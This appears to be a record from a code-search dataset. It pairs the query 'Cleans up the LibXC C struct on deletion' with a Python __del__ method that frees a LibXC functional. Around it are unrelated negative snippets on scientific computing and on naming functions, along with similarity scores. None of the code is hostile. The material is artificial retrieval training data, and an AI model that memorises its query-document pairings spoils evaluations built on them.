_GetCorrelationFunction(Ri='S',Rj='D',AAP=[_Hydrophobicity,_hydrophilicity,_residuemass]):\n\tHydrophobicity=NormalizeEachAAP(AAP[0])\n\thydrophilicity=NormalizeEachAAP(AAP[1])\n\tresiduemass=NormalizeEachAAP(AAP[2])\n\ttheta1=math.pow(Hydrophobicity[Ri]-Hydrophobicity[Rj],2)\n\ttheta2=math.pow(hydrophilicity[Ri]-hydrophilicity[Rj],2)\n\ttheta3=math.pow(residuemass[Ri]-residuemass[Rj],2)\n\ttheta=round((theta1+theta2+theta3)/3.0,3)\n\treturn theta", "def __init__(\n self, problem_results: ProblemResults, demand_instruments: Array, supply_instruments: Array,\n inverse_covariance_matrix: Array, expected_xi_jacobian: Array, expected_omega_jacobian: Array,\n expected_prices: Array, expected_shares: Array, start_time: float, end_time: float, draws: int,\n iteration_stats: Sequence[Mapping[Hashable, SolverStats]]) -> None:\n self.problem_results = problem_results\n self.demand_instruments = demand_instruments\n self.supply_instruments = supply_instruments\n self.inverse_covariance_matrix = inverse_covariance_matrix\n self.expected_xi_by_theta_jacobian = expected_xi_jacobian\n self.expected_omega_by_theta_jacobian = expected_omega_jacobian\n self.expected_prices = expected_prices\n self.expected_shares = expected_shares\n self.computation_time = end_time - start_time\n self.draws = draws\n unique_market_ids = problem_results.problem.unique_market_ids\n self.fp_converged = np.array(\n [[m[t].converged if m else True for m in iteration_stats] for t in unique_market_ids], dtype=np.bool_\n )\n self.fp_iterations = np.array(\n [[m[t].iterations if m else 0 for m in iteration_stats] for t in unique_market_ids], dtype=np.int64\n )\n self.contraction_evaluations = np.array(\n [[m[t].evaluations if m else 0 for m in iteration_stats] for t in unique_market_ids], dtype=np.int64\n )\n\n # construct default supply and demand shifter formulations\n self.supply_shifter_formulation = self.demand_shifter_formulation = None\n if self.problem_results.problem.K3 > 0:\n assert self.problem_results.problem.product_formulations[0] is not None\n assert self.problem_results.problem.product_formulations[2] is not None\n\n X1_terms = self.problem_results.problem.product_formulations[0]._terms\n X3_terms = self.problem_results.problem.product_formulations[2]._terms\n X1_expressions = self.problem_results.problem.product_formulations[0]._expressions\n X3_expressions = self.problem_results.problem.product_formulations[2]._expressions\n\n supply_shifters = set()\n for term, expression in zip(X3_terms, X3_expressions):\n if all(str(s) != 'shares' for s in expression.free_symbols) and term.name() != 'Intercept':\n supply_shifters.add(term.name())\n\n demand_shifters = set()\n for term, expression in zip(X1_terms, X1_expressions):\n if all(str(s) != 'prices' for s in expression.free_symbols) and term.name() != 'Intercept':\n demand_shifters.add(term.name())\n\n if supply_shifters - demand_shifters:\n supply_shifter_formula = ' + '.join(sorted(supply_shifters - demand_shifters))\n self.supply_shifter_formulation = Formulation(f'{supply_shifter_formula} - 1')\n\n if demand_shifters - supply_shifters:\n demand_shifter_formula = ' + '.join(sorted(demand_shifters - supply_shifters))\n self.demand_shifter_formulation = Formulation(f'{demand_shifter_formula} - 1')", "def get_characteristic_vals(self):\n\n # Characteristic quantity of x\n x = scutils.qv2x(self.dyn_sys.tpwl_dict['q'], self.dyn_sys.tpwl_dict['v'])\n x_char = np.abs(x).max(axis=0)\n\n # Characteristic quantity of the dynamics f\n f = np.zeros(x.shape)\n for i in range(x.shape[0]):\n f[i, :], _, _ = self.get_continuous_dynamics(x[i, :], self.dyn_sys.tpwl_dict['u'][i, :])\n f_char = np.abs(f).max(axis=0)\n\n return x_char, f_char", "def _construct_compute_fe_terms(self):\n # setup some symbolic variables for theano to deal with\n xi = T.matrix()\n xo = T.matrix()\n _, hi_zmuv = self._construct_zmuv_samples(xi, 1)\n # construct values to output\n nll = self.nlli[-1]\n kld = self.kld_z.flatten() + self.kld_hi_q2p.flatten()\n # compile theano function for a one-sample free-energy estimate\n fe_term_sample = theano.function(inputs=[ xi, xo ], \\\n outputs=[nll, kld], \\\n givens={self.x_in: xi, \\\n self.x_out: xo, \\\n self.hi_zmuv: hi_zmuv}, \\\n updates=self.scan_updates)\n # construct a wrapper function for multi-sample free-energy estimate\n def fe_term_estimator(XI, XO, sample_count):\n # compute a multi-sample estimate of variational free-energy\n nll_sum = np.zeros((XI.shape[0],))\n kld_sum = np.zeros((XI.shape[0],))\n for i in range(sample_count):\n result = fe_term_sample(XI, XO)\n nll_sum += result[0].ravel()\n kld_sum += result[1].ravel()\n mean_nll = nll_sum / float(sample_count)\n mean_kld = kld_sum / float(sample_count)\n return [mean_nll, mean_kld]\n return fe_term_estimator", "def getcfix(self):\n cfix_ = ctypes.c_double()\n res = __library__.MSK_XX_getcfix(self.__nativep,ctypes.byref(cfix_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n cfix_ = cfix_.value\n _cfix_return_value = cfix_\n return (_cfix_return_value)", "def calculate(self):\n\n fx_r = self.fx + self.r\n fy_r = self.fy\n gx_r = self.gx + self.r\n gy_r = self.gy\n\n fg_dx = np.linspace(self.fx[0], gx_r[-1], self.N)\n ff_dx = np.linspace(self.fx[0], fx_r[-1], self.N)\n gg_dx = np.linspace(self.gx[0], gx_r[-1], self.N)\n\n xCorrfg = integrate.trapz(self.fy*gy_r, fg_dx)\n aCorrff = integrate.trapz(self.fy*fy_r, ff_dx)\n aCorrgg = integrate.trapz(self.gy*gy_r, gg_dx)\n\n xCorrfg_w = integrate.trapz(self.w*xCorrfg, self.r)\n aCorrff_w = integrate.trapz(self.w*aCorrff, self.r)\n aCorrgg_w = integrate.trapz(self.w*aCorrgg, self.r)\n \n return xCorrfg_w / np.sqrt(aCorrff_w * aCorrgg_w)", "def getfquad(element, energy=None, fwhm_ev = 0, lw = 50, f1f2 = \"f1\",\n kernel=\"cauchy\"):\n try: Z = int(element)\n except: Z = elements.Z[element]\n \n fwhm_ev = abs(fwhm_ev)\n \n if energy is None:\n energy, iedge = get_energies(Z, 1000, 10000, fwhm_ev=fwhm_ev)\n return_ene = True\n else:\n energy = np.array(energy, ndmin=1)\n return_ene = False\n \n if f1f2 == \"f2\" or f1f2 == 1:\n ind = 1\n else:\n ind = 0\n \n \n if fwhm_ev <= np.finfo(float).eps:\n result = deltaf.clcalc(Z, energy)[ind]\n else:\n \n if kernel==\"cauchy\":\n corrfac = 1./quad(cauchy, -lw, lw, args=(1,), limit=500)[0]\n integrand = lambda x, E: cauchy(x, fwhm_ev) * deltaf.clcalc(Z, E-x)[ind]\n elif kernel==\"normal\":\n corrfac = 1./quad(normal, -lw, lw, args=(1,), limit=500)[0]\n integrand = lambda x, E: normal(x, fwhm_ev) * deltaf.clcalc(Z, E-x)[ind]\n \n def ffunc(E):\n return quad(integrand, -lw*fwhm_ev, lw*fwhm_ev, args=(E,), limit=500)[0]\n \n if np.isscalar(energy) or len(energy)==1:\n result = corrfac * ffunc(energy)\n else:\n fvec = np.vectorize(ffunc)\n result = corrfac * fvec(energy)\n \n if return_ene:\n return energy, result\n else:\n return result", "def __call__ ( self , x ) :\n return complex_derivative ( self.func ,\n complex ( x ) ,\n h = self.step ,\n I = self.order ,\n err = self.err ,\n real = self.__real ,\n imag = self.__imag )", "def _derX(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c])\n return dfdx", "def run_fourier_ring_correlation(self, bin_size=None):\n # This is done in the fourier plane\n exp_ft = self.exp.fft(True)\n obs_ft = self.obs.fft(True)\n\n # Get correlations\n axdict = obs_ft.axes_manager.as_dictionary()\n axdict = [axdict[keys] for keys in axdict.keys()]\n exp_obs_xc = ModifiedImage(np.real(obs_ft * np.conj(exp_ft)), axes=axdict)\n obs_ac = ModifiedImage(obs_ft.amplitude**2, axes=axdict)\n\n axdict = exp_ft.axes_manager.as_dictionary()\n axdict = [axdict[keys] for keys in axdict.keys()]\n exp_ac = ModifiedImage(exp_ft.amplitude**2, axes=axdict)\n\n xc = exp_obs_xc.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n ac1 = exp_ac.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n ac2 = obs_ac.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n\n fsc = xc / np.sqrt(ac1*ac2)\n\n fsc.axes_manager[-1].units = obs_ft.axes_manager[-1].units\n fsc.axes_manager[-1].name = r'|q| = |1/r|'\n\n return fsc", "def flux(source, freq=0.0, deltafreq=0.0, daysback=0.0) :\n x = queryFlux(source,freq,deltafreq,daysback)\n return x.flux", "def GetCorrelationFunction(Ri='S',Rj='D',AAP=[]):\n\tNumAAP=len(AAP)\n\ttheta=0.0\n\tfor i in range(NumAAP):\n\t\ttemp=NormalizeEachAAP(AAP[i])\n\t\ttheta=theta+math.pow(temp[Ri]-temp[Rj],2)\n\tresult=round(theta/NumAAP,3)\n\treturn result", "def itkCumulativeGaussianCostFunction_cast(*args):\n return _ITKCostFunctionsPython.itkCumulativeGaussianCostFunction_cast(*args)", "def get_quantum_corr(self, source: str, row: int) -> np.float:\n if source.lower() == 'meas': \n if self.meas_qcorr is not None:\n return self._meas_qcorr[self._check_int(row)]\n else:\n raise qiskit.QiskitError(\n \"To return measured quantum correlations please add qiskit results.\")\n elif source.lower() == 'calc':\n return self._calc_qcorr.setdefault(row,self.quantum_prob(row))\n else:\n raise qiskit.QiskitError(\n \"Invalid source of quantum correlations. Should be 'meas' or 'calc'.\")", "def calculate_economics(\n irradiance: pd.DataFrame, temperature: pd.DataFrame, wind_speed: pd.DataFrame,\n CECMod: pd.DataFrame, configuration: float = 1\n ):\n p_out = calculate_dc_output(irradiance, temperature, wind_speed, CECMod=CECMod)\n\n # convert dc to AC - considering a flat loss of 14%\n # we have to improve this in the future\n p_out = [v * 0.86 for v in p_out]\n\n day_count = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n monthly_electricity = []\n\n for month in range(12):\n st_index = sum(day_count[:month + 1]) * 24\n end_index = sum(day_count[:month + 2]) * 24\n data = p_out[st_index: end_index]\n # Note: division by 50 is to match the values - remove it later!\n monthly_electricity.append(sum(data) / len(data) / 50)\n\n total_ac_energy = sum(p_out)\n monthly_ac_energy = pd.DataFrame(\n zip(calendar.month_abbr[1:], monthly_electricity),\n columns=['month', 'Thousand kWh']\n )\n\n # Based on the example here: https://nrel-pysam.readthedocs.io/en/master/Import.html\n\n grid = Grid.default(\"PVWattsCommercial\")\n ur = UtilityRate.from_existing(grid, \"PVWattsCommercial\")\n cl = Cashloan.from_existing(grid,\"PVWattsCommercial\")\n\n sam_data = read_sam_data(configuration)\n for module, data in zip([grid, ur, cl], sam_data[:-1]):\n for k, v in data.items():\n if k == 'number_inputs':\n continue\n try:\n module.value(k, v)\n except AttributeError:\n print(module, k, v)\n\n\n grid.SystemOutput.gen = p_out\n\n grid.execute()\n ur.execute()\n cl.execute()\n\n # list possible outputs here\n adjusted_installed_cost = cl.Outputs.adjusted_installed_cost\n payback_cash_flow = [-1 * x for x in cl.Outputs.cf_discounted_payback]\n\n return total_ac_energy, monthly_ac_energy, adjusted_installed_cost, payback_cash_flow", "def calculate_correlations(input_data, index_col, cat_features, exclu_elements): \r\n try:\r\n # encode the categorical features\r\n encoded_data = pd.get_dummies(input_data,columns=cat_features,drop_first=True)\r\n\r\n pd_transposed_data = encoded_data.set_index('Style_display_code').T\r\n\r\n # get the number of items\r\n items_list = [str(a) for a in pd_transposed_data.columns]\r\n\r\n print(\"Number of items to correlate :{}_Timestamp:{}\".format(str(len(items_list)), \r\n format(str(datetime.now()))))\r\n \r\n\r\n #compute correlations and save the pickle file\r\n# matrix = pd_transposed_data.corr().values\r\n# pickle.dump(matrix, open(staging_dir+ '/corr_matrix_output_py3.p', 'wb'))\r\n \r\n # read from the saved pickle file - ONLY FOR CONSECUTIVE RUNS, TO SAVE TIME\r\n matrix = pickle.load(open(staging_dir+ '/corr_matrix_output_py3.p', \"rb\" ) )\r\n\r\n print(\"Corr Matrix size:{}_Timestamp:{}\".format(str(matrix.size),\r\n format(str(datetime.now()))))\r\n\r\n except Exception as e:\r\n print(\" Error !!\", e)\r\n \r\n # return the top correlated items\r\n return top_correlateditems(items_list,matrix, index_col, exclu_elements)", "def __call__(self, x):\n\n np.subtract(x, self.d, out=x)\n np.divide(self.a, x, out=x)\n np.subtract(x, self.b, out=x)\n np.log(x, out=x)\n np.divide(x, -self.e, out=x)\n np.add(x, self.c, out=x)\n\n return x", "def test_single_ended_ols_wls_fix_gamma_fix_dalpha_synthetic():\n\n from dtscalibration import DataStore\n import numpy as np\n\n np.random.seed(0)\n\n cable_len = 100.\n nt = 50\n time = np.arange(nt)\n x = np.linspace(0., cable_len, 500)\n ts_cold = np.ones(nt) * 4.\n ts_warm = np.ones(nt) * 20.\n\n C_p = 15246\n C_m = 2400.\n dalpha_r = 0.0005284\n dalpha_m = 0.0004961\n dalpha_p = 0.0005607\n gamma = 482.6\n cold_mask = x < 0.5 * cable_len\n warm_mask = np.invert(cold_mask) # == False\n temp_real = np.ones((len(x), nt))\n temp_real[cold_mask] *= ts_cold + 273.15\n temp_real[warm_mask] *= ts_warm + 273.15\n\n st = C_p * np.exp(-dalpha_r * x[:, None]) * \\\n np.exp(-dalpha_p * x[:, None]) * \\\n np.exp(gamma / temp_real) / (np.exp(gamma / temp_real) - 1)\n ast = C_m * np.exp(-dalpha_r * x[:, None]) * \\\n np.exp(-dalpha_m * x[:, None]) / (np.exp(gamma / temp_real) - 1)\n\n print('alphaint', cable_len * (dalpha_p - dalpha_m))\n print('alpha', dalpha_p - dalpha_m)\n print('C', np.log(C_p / C_m))\n print('x0', x.max())\n\n ds = DataStore({\n 'st': (['x', 'time'], st),\n 'ast': (['x', 'time'], ast),\n 'userAcquisitionTimeFW': (['time'], np.ones(nt)),\n 'cold': (['time'], ts_cold),\n 'warm': (['time'], ts_warm)\n },\n coords={\n 'x': x,\n 'time': time},\n attrs={\n 'isDoubleEnded': '0'})\n\n sections = {\n 'cold': [slice(0., 0.5 * cable_len)],\n 'warm': [slice(0.5 * cable_len, cable_len)]}\n\n # OLS\n ds.calibration_single_ended(sections=sections,\n st_label='st',\n ast_label='ast',\n method='ols',\n solver='sparse',\n fix_gamma=(gamma, 0.),\n fix_dalpha=(dalpha_p - dalpha_m, 0.))\n\n np.testing.assert_almost_equal(\n ds.gamma.values, gamma, decimal=6)\n np.testing.assert_almost_equal(\n ds.dalpha.values, dalpha_p - dalpha_m, decimal=8)\n np.testing.assert_almost_equal(\n ds.TMPF.values, temp_real - 273.15, decimal=4)\n\n # WLS\n ds.calibration_single_ended(sections=sections,\n st_label='st',\n ast_label='ast',\n st_var=1.,\n ast_var=1.,\n method='wls',\n solver='sparse',\n fix_gamma=(gamma, 0.),\n fix_dalpha=(dalpha_p - dalpha_m, 0.))\n\n np.testing.assert_almost_equal(\n ds.gamma.values, gamma, decimal=6)\n np.testing.assert_almost_equal(\n ds.dalpha.values, dalpha_p - dalpha_m, decimal=8)\n np.testing.assert_almost_equal(\n ds.TMPF.values, temp_real - 273.15, decimal=4)\n\n pass" ]
[ "0.5634133", "0.5603821", "0.5425639", "0.53961235", "0.5307997", "0.5247506", "0.5236571", "0.5233002", "0.52122086", "0.519866", "0.5186619", "0.51836646", "0.5171188", "0.51476127", "0.51282215", "0.51221067", "0.5082539", "0.5082539", "0.50807905", "0.5078336", "0.5075296", "0.5070359", "0.5068547", "0.50611126", "0.50481534", "0.5042373", "0.5021188", "0.50179434", "0.5012504", "0.49964428", "0.49886325", "0.4974125", "0.49678797", "0.49606818", "0.4938198", "0.49151194", "0.49033985", "0.48961076", "0.48744848", "0.48716778", "0.48515543", "0.48448727", "0.4839649", "0.48394287", "0.483455", "0.48292154", "0.48219216", "0.48182544", "0.4816175", "0.48128682", "0.48119578", "0.48096263", "0.48084232", "0.48052046", "0.4804946", "0.48016778", "0.47993764", "0.4795926", "0.47957864", "0.47928298", "0.47837064", "0.47766277", "0.47765136", "0.47716552", "0.47680125", "0.47670707", "0.47643816", "0.47460282", "0.4745649", "0.473664", "0.47324252", "0.47257254", "0.47191173", "0.4716465", "0.47120783", "0.47049347", "0.4704091", "0.47015035", "0.46982777", "0.46940774", "0.46926123", "0.46926013", "0.4691884", "0.46918806", "0.4690818", "0.46908054", "0.4685073", "0.46841073", "0.4683357", "0.46818414", "0.46814144", "0.46685508", "0.46673796", "0.46661085", "0.46645737", "0.46626", "0.46597207", "0.4656379", "0.46476462", "0.4638474" ]
0.5122659
15
Cleans up the LibXC C struct on deletion
def __del__(self): if self.xc_func is None: return if self._xc_func_init: core.xc_func_end(self.xc_func) core.xc_func_free(self.xc_func)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __del__(self):\n #self.myCModule.free_array(self.arrayRef)\n pass", "def cleanup(self):\n\n self.PLC['1'].set_plc_mode(0)\n self.PLC['1'].plc_clear('all')\n super(Test200SmartSanityClear005, self).cleanup()", "def _clean_up(self):", "def cleanup(self):\n self._tmp_obj.cleanup()", "def cleanup(self):", "def cleanup(self):", "def cleanup(self):", "def cleanup():", "def __del__(self):\r\n self.cleanup()", "def __del__(self):\n LIB.mnt_grid_del.argtypes = [POINTER(c_void_p)]\n ier = LIB.mnt_grid_del(self.obj)\n if ier:\n error_handler(FILE, '__del__', ier)", "def test_data_object_del_all(self):\n pass", "def __exit__(self, exc_type, exc_value, traceback):\n\t\tself.delete_extracted()\n\t\tself.delete()", "def cleanup(self):\n shutil.rmtree(self._crx_dir)\n self._crx_dir = None", "def __del__(self):\n del self.traj\n del self.dcf\n del self._tmp_fft_array\n del self.cl_kerneltable\n del self.cl_deapo\n del self._check\n del self.queue\n del self.ctx\n del self.prg\n del self.fft", "def __del__(self):\n del self.traj\n del self.dcf\n del self._tmp_fft_array\n del self.cl_kerneltable\n del self.cl_deapo\n del self._check\n del self.queue\n del self.ctx\n del self.prg\n del self.fft", "def clean_up(self):\n while len(self.__refs_for_deletion): \n attr = self.__refs_for_deletion.pop()\n obj = getattr(self, attr)\n if hasattr(obj, 'clean_up'):\n obj.clean_up()\n delattr(self, attr)", "def clean_up(self):\n\t\tpass", "def __delete__(self, instance):\n self._lib_vscf_ecc.vscf_ecc_delete(self.ctx)", "def clean(obj):\n clean_up_generated_files(obj)", "def __del__(self):\r\n self.clearList()", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def cleanUp(self):\r\n pass", "def __del__(self):\n\t\tself._pc.gid_clear()", "def cleanup():\n cat = CSVCatalog.CSVCatalog()\n cat.drop_table(\"people\")\n cat.drop_table(\"batting\")\n cat.drop_table(\"teams\")", "def destroy(self):\n self.db = None\n self.gen_cursor = None\n self.map = None\n self.fmap = None\n self.smap = None\n FlatBaseModel.destroy(self)", "def __del__(self):\n self._cleanup()", "async def clean_up(self) -> None:", "def clearRecord(self): \n if self._isinstalled:\n for f in self._table:\n try:\n del self.__dict__[f.name]\n except KeyError:\n pass\n \n for f in self._extra_sql_columns:\n try:\n del self.__dict__[f]\n except KeyError:\n pass\n \n self._original_values.clear()\n self._modified_values.clear()\n self._mtm_referencelist.clear()\n self._child_referencelist.clear()\n self._hasdata = False\n self._ismodified = False\n self._hasdata = False\n self._isnew = False\n self._objectid = None\n self._isinstalled = False\n self._astxt = \"(null)\"", "def destroy(self):\n if self._ptr is not None:\n # run and remove destructor on c data\n _global_destroy(self._display, self._ptr)\n ffi.gc(self._ptr, None)\n self._ptr = None\n self._display = None", "def cleanup(self):\r\n pass", "def clean_up(self):\n pass", "def clean_up(self):\n pass", "def clean(c):\n clean_docker(c)\n clean_repo(c)", "def __del__(self):\n self._destruct()", "def cleanup():\n cat = CSVCatalog.CSVCatalog()\n cat.drop_table(\"people\", force_drop=True)\n cat.drop_table(\"batting\", force_drop=True)\n cat.drop_table(\"teams\", force_drop=True)", "def destroy(self):", "def destroy(self):", "def destroy(self):", "def test_data_object_del(self):\n pass", "def cleanup_and_reset(self):\n self.mem.set(self.mem.META_PLAN, None)\n self.mem.set(self.mem.META_GOALS, None)\n self.mem.set(self.mem.META_CURR_GOAL, None)", "def clear(self):\r\n\t\tself.free_objects[:] = []", "def cleanup(self):\r\n pass", "def cleanup(self):\r\n pass", "def delete_reference_array(self):\r\n del self.pxarray\r\n return", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def __del__(self):\n self.Clear()", "def __del__(self):\n if self.hostId_ct.value >= 0:\n self.libcfdll.nccf_free_host(self.hostId_ct)\n self.hostId_ct.value = -1", "def cleanup(self):\n\n pass", "def _clean(self):\n map(self.__delitem__, self.keys())\n self._original = []\n self._columns = {}\n self._modified, self._deleted = {}, {}", "def CrossCleanUp():\n\n global Asm\n\n dec.Asm.Memory = 0\n target.BoundarySync()", "def cleanUp():\n pass", "def cleanup (self):\n pass", "def clear_cxt_vars(cxt):\n if hasattr(cxt, '_cl'):\n del cxt._cl\n if hasattr(cxt, '_pairs'):\n del cxt._pairs", "def cleanup(self, *args, **kwargs):", "def CleanUp(self):\n self.cmd.CleanUp()", "def cleanup():\r\n compiledir = theano.config.compiledir\r\n for directory in os.listdir(compiledir):\r\n file = None\r\n try:\r\n try:\r\n filename = os.path.join(compiledir, directory, \"key.pkl\")\r\n file = open(filename, 'rb')\r\n #print file\r\n try:\r\n keydata = cPickle.load(file)\r\n for key in list(keydata.keys):\r\n have_npy_abi_version = False\r\n have_c_compiler = False\r\n for obj in flatten(key):\r\n if isinstance(obj, numpy.ndarray):\r\n #Reuse have_npy_abi_version to\r\n #force the removing of key\r\n have_npy_abi_version = False\r\n break\r\n elif isinstance(obj, basestring):\r\n if obj.startswith('NPY_ABI_VERSION=0x'):\r\n have_npy_abi_version = True\r\n elif obj.startswith('c_compiler_str='):\r\n have_c_compiler = True\r\n elif (isinstance(obj, (theano.gof.Op, theano.gof.Type)) and\r\n hasattr(obj, 'c_code_cache_version')):\r\n v = obj.c_code_cache_version()\r\n if v not in [(), None] and v not in key[0]:\r\n #Reuse have_npy_abi_version to\r\n #force the removing of key\r\n have_npy_abi_version = False\r\n break\r\n\r\n if not have_npy_abi_version or not have_c_compiler:\r\n try:\r\n #This can happen when we move the compiledir.\r\n if keydata.key_pkl != filename:\r\n keydata.key_pkl = filename\r\n keydata.remove_key(key)\r\n except IOError, e:\r\n _logger.error(\r\n \"Could not remove file '%s'. To complete \"\r\n \"the clean-up, please remove manually \"\r\n \"the directory containing it.\",\r\n filename)\r\n if len(keydata.keys) == 0:\r\n shutil.rmtree(os.path.join(compiledir, directory))\r\n\r\n except EOFError:\r\n _logger.error(\r\n \"Could not read key file '%s'. To complete \"\r\n \"the clean-up, please remove manually \"\r\n \"the directory containing it.\",\r\n filename)\r\n except IOError:\r\n _logger.error(\r\n \"Could not clean up this directory: '%s'. To complete \"\r\n \"the clean-up, please remove it manually.\",\r\n directory)\r\n finally:\r\n if file is not None:\r\n file.close()", "def clean(c):", "def deinit(self):\n pass", "def deinit(self):\n pass", "def clean(self):\n # Delete vertices / faces / colors / normals :\n self._vert_buffer.delete()\n self._index_buffer.delete()\n self._normals_buffer.delete()\n self._xrange_buffer.delete()\n self._math_buffer.delete()", "def delete():\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # The interatomic data.\n for interatom in interatomic_loop():\n # The data.\n if hasattr(interatom, 'j_coupling'):\n del interatom.j_coupling\n\n # The error.\n if hasattr(interatom, 'j_coupling_err'):\n del interatom.j_coupling_err", "def __del__(self):\r\n pass", "def delete(self):\n self.data = None", "def __cleanup(self):\n self.display = None\n self.parent = None\n self.name = None\n self.files = None\n return self", "def __del__(self):\n pass", "def __del__(self):\n pass", "def clear_structure(self):\n self.structure = []\n return", "def cleanup(self):\n\t\tself.pb.cleanup()\n\t\tsys.exit()", "def destroy(self):\n pass # Nothing for now", "def __del__(self):\n\n # Base class destructor is called ?? needed\n sim.Simulation.__del__(self)\n\n if self.verbose:\n print \"Cleaning derived simulation object LAMMPS1\"\n\n del self.pairCoeffDct\n del self.bondCoeffDct", "def clean_up(self):\n # TODO: Implement if needed\n pass", "def destroy():\n pass", "def destroy():\n pass", "def __del__(self):\n \n pass", "def finalizer():\n for resource_type in pods, pvcs, storageclasses, secrets:\n for resource in resource_type:\n resource.delete()\n resource.ocp.wait_for_delete(resource.name)\n if pools:\n # Delete only the RBD pool\n pools[0].delete()\n if projects:\n for project in projects:\n project.delete(resource_name=project.namespace)\n project.wait_for_delete(project.namespace)", "def __delete__(self):\n pass", "def clean():\n clean_flatbuffer_binaries()\n clean_webp_textures()", "def __del__(self) -> None:\n self.delete()", "def __del__(self):\n if self._alloc:\n _pychidg.f90wrap_graphics_bc_t_finalise(this=self._handle)", "def clear(self):\n self._multivol.deallocate(self.id)" ]
[ "0.6692683", "0.64728636", "0.6445634", "0.6374687", "0.63566375", "0.63566375", "0.63566375", "0.63114005", "0.6220566", "0.62159604", "0.62110907", "0.6195016", "0.61885726", "0.6173303", "0.6173303", "0.615202", "0.6146283", "0.6124178", "0.61184067", "0.6114401", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.6098205", "0.60864455", "0.6078006", "0.6067854", "0.6060185", "0.6047654", "0.6039228", "0.60363287", "0.6029367", "0.6026324", "0.6026324", "0.6023784", "0.60190177", "0.6018821", "0.6015646", "0.6015646", "0.6015646", "0.6015621", "0.60144675", "0.5999434", "0.5992235", "0.5992235", "0.5987444", "0.5981281", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5978798", "0.59767914", "0.5959697", "0.5956959", "0.5949664", "0.59440464", "0.5930683", "0.5929588", "0.5926205", "0.5925768", "0.5924757", "0.5924709", "0.59114546", "0.59114546", "0.5902326", "0.5882815", "0.588194", "0.5879449", "0.5876982", "0.58627677", "0.58627677", "0.58619076", "0.58606404", "0.58596236", "0.585157", "0.5849655", "0.5846428", "0.5846428", "0.58452034", "0.58374727", "0.5826306", "0.5819629", "0.5818305", "0.5815372", "0.5814433" ]
0.5984679
53
Provides a simple string representation with functional name data.
def __repr__(self): return '<%s.%s (%s) object at %s>' % (self.__class__.__module__, self.__class__.__name__, self._xc_func_name, hex(id(self)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def __str__(self):\n return self.function_representation", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def name(self):\n\t\treturn self._func_name", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def get_name() -> str:", "def get_name():", "def name():\n\n pass", "def name(self):\n return str()", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def nice_name():\n\n pass", "def display_name(self) -> str:\n return f\"{self.func.__module__}.{self.func.__qualname__}\"", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(UmbrellaSampling.key, self.x0, self.kf, self.n_upd)\n\n return strme", "def name():\n pass", "def name():\n pass", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def _function_name(func):\n return \"Calling the function: def {}()\".format(func.__name__)", "def __name__(self):\n return '_'.join([function.__name__ for function in self.functions])", "def _str_make(self):\n return self._name if self._fact is None else f\"{self._fact} × {self._name}\"", "def __repr__(self) -> str:\n return f\"<Function[{self.name}](line:{self.line})>\"", "def __str__(self):\n names = [self.name]\n names += [_callable_name(transform) for transform in self.transforms]\n return ' | '.join(names) + f' -> {self.shape} {self.dtype}'", "def getName(self):\n return \"\"", "def __str__(self) -> str:\n # The default str() for Function includes the arity, which is redundant\n # here. Just use the symbol's name.\n root_str = self.root.name\n children_str = ', '.join(str(child) for child in self.children)\n return f'{root_str}({children_str})'", "def __str__(self):\n datastr = self.f_val_to_str()\n return_string = \"%s %s\" % (self.f_get_class_name(), self.v_full_name)\n if self.v_comment:\n return_string += \" (`%s`)\" % self.v_comment\n if datastr:\n return_string += \": \" + datastr\n\n return return_string", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def name() -> str:\n pass", "def uniquify_name(self):\n self.name = f'{self.get_name()}_{len(self.store.get_user_functions())}'", "def __str__(self):\n sgf = self.grad_fn\n return \"{}{}\".format(\n str(self.data),\n \", 